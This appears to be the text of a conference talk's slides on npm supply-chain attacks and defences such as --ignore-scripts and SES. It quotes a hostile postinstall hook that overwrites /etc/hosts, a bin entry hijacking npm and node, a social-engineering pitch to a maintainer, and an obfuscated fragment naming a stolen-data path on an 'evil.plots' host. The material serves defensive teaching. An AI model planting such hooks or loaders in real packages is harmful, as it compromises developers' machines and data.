I'm running code from the internet!
@naugtur, 2022/2023
Wouldn't it be great to fearlessly use them like we did back in 2015?
## Story time

Let's install some dependencies!
Ok, catch this: 📦
I'm gonna sneak it in as
a dev dependency of yours
That's what you think.
"postinstall": "echo 💩 > /etc/hosts"
### Ok, wait
npm ci
cp node_modules s3://
#### Using typescript maybe?
### Hold my 🍺
## ignore scripts
npm ci --ignore-scripts
Run selected scritps
npm rebuild bcrypt
#### look what I found!

I see you use scripts
"bin": {
"npm": "./evilPlots.js",
"node": "./evilPlots.js"
credit: https://socket.dev/blog/npm-bin-script-confusion
# 🤯
but npm said it was a feature! 😭
#### let's get serious
> Dear ${ eslintPluginMaintainer },
> I understand you're busy and I'd be happy to help with maintenance of your
tiny but popular plugin...
#### ok, just in case you do
const _0x765e5=_0x46a0;(function(_0x57764e,_0x91aa41){const
{const _0x5d9864=['/stolen/','evil.plots','2511378rgvTaf','5826vwOBSz','3845SrYtZx',
_0x3641=function(){return _0x5d9864;};return _0x3641();}function _0x46a0(_0x24c0cb,_0x27294c){const
_0x3641a1=_0x3641();return _0x46a0=function(_0x46a08f,_0x225127){_0x46a08f=_0x46a08f-0x14f;let
_0x16a89a=_0x3641a1[_0x46a08f];return _0x16a89a;},
#### should I keep going?

#### yo, there's an app for that!

### what's inside?

### I want to know more about SES
[Earlier talk with more SES details](https://www.youtube.com/watch?v=Qjeh7Qo2u28)
[Mark Miller on F5 Tech Talks](https://www.youtube.com/watch?v=u-XETUbxNUU)
### bonus
Malware analysis with SES
⚠️ experimental